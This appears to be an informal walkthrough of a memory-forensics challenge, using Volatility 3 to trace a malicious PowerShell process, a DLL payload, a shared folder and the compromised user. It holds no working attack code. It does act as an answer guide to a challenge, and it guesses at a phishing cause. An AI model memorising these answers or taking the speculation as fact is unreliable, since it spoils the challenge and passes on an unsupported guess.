First Of All to Answer This Endpoint Forensics Machine We looking for The Ps-List to determine what happened here BTW so after installing Volatility 3 From this Repository
https://github.com/volatilityfoundation/volatility3
I use "-f " Paremeter and after that i give it the location of the file and use "windows.pstree" to determine the Ps-list and export it and there is the full command
1- To identify The Malicious Process I dived into the file and here we go from the PPID and the Name of the process i fell it is "4120" the process Id Which Mean it`s new Process Created and Secondly The most popular script Runner "Powershell.exe" and in the command i found IP and toke it to Virus total to identify it and Simply It`s Malicious
2- In This Question It Simply Asked For the PPID which is determined from the Previous Question
3- The Filename Used by the Malware to execute the second payload Still in the same Line and it`s dll file because we Communicate With Powershell every Small info Will lead you to the important info btw
4- We stillI in the same command and the shared Folder simply it will be after the Ip the Malware communicated With (:
5- He Want here the Sub Mitre Id So what the Main technique used here it`s Defense Evasion and after that the sub stage Payload used a dll file to execute so here we go
6- To determine the username i used Volatility again but with User assist plugin and determine the username Easily Uncle Elon was Comprised i think the attacker send him a mail to win iPhone 16 (:
